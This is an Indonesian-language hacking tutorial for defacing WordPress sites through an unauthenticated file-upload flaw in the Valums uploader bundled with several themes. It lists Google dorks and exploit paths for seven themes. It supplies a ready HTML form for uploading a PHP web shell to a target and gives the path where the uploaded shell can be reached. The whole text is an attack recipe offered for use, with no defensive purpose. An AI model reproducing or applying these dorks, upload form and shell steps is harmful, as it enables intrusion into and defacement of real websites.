Tutorial Deface dengan eXploit WordPress Valums Uploader Shell Upload.
eXploit ini memanfaatkan Bug pada valums uploader di Themes nya.
1. Dork: inurl:/wp-content/themes/nuance/
exploit: /functions/jwpanel/scripts/valums_uploader/php.php
2. Dork: inurl:/wp-content/themes/lightspeed/
exploit: /framework/_scripts/valums_uploader/php.php
3. Dork: inurl:/wp-content/themes/saico/
exploit: /framework/_scripts/valums_uploader/php.php
4. Dork: inurl:/wp-content/themes/eptonic/
exploit: /functions/jwpanel/scripts/valums_uploader/php.php
5. Dork: inurl:/wp-content/themes/skinizer/
exploit: /framework/_scripts/valums_uploader/php.php
6. Dork: inurl:/wp-content/themes/area53/
exploit: /framework/_scripts/valums_uploader/php.php
7. Dork: inurl:/wp-content/themes/blinc/
exploit: /framework/_scripts/valums_uploader/php.php
Cara nya Langsung ke Search ke Google pake Dork diatas.
Web Vuln ciri2nya kek gini.. ada tulisan {"error":"No files were uploaded.",
Langsung Buat CRSF pake notepad Save dengan ekstensi html
<form enctype="multipart/form-data"action="target.com/wp-content/themes/eptonic/functions/jwpanel/scripts/valums_uploader/php.php" method="post"><input type="jpg" name="url" value="./" /><br />Please choose a file: <input name="qqfile" type="file" /><br /><input type="submit" value="upload" /></form>
Kalo males buat bisa pake ini KlikDisini.
Pake CSRF Mana aja bisa.. nih contoh web yg File nya sukses terupload.
Shell Akses file: /wp-content/uploads/tahun/bulan/namashell.php
contoh: target.com/wp-content/uploads/2016/12/nueenggak.phpSemoga bermanfaat .. terimakasih. Sampai ketemu di tutorial selanjutnya